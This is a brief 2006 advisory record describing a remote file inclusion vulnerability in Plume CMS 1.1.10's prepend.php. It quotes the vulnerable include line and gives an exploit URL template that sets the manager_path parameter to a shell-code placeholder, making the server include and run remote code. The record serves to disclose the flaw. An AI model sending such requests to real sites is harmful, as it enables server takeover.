Plume CMS <= 1.1.10 [prepend.php] Remote File Include Vulnerability

2006-09-19T00:00:00
ID SECURITYVULNS:DOC:14327
Type securityvulns
Reporter Securityvulns
Modified 2006-09-19T00:00:00

Description

Vendor: Plume CMS 1.1.10 Found By : D3nGeR Scripit Site : http://plume-cms.net

in file [prepend.php]

; include_once $_PX_config['manager_path'].'/inc/class.config.php'

code http://site.com/[path]manager/frontinc/prepend.php?_PX_config[manager_path]=[shell code ]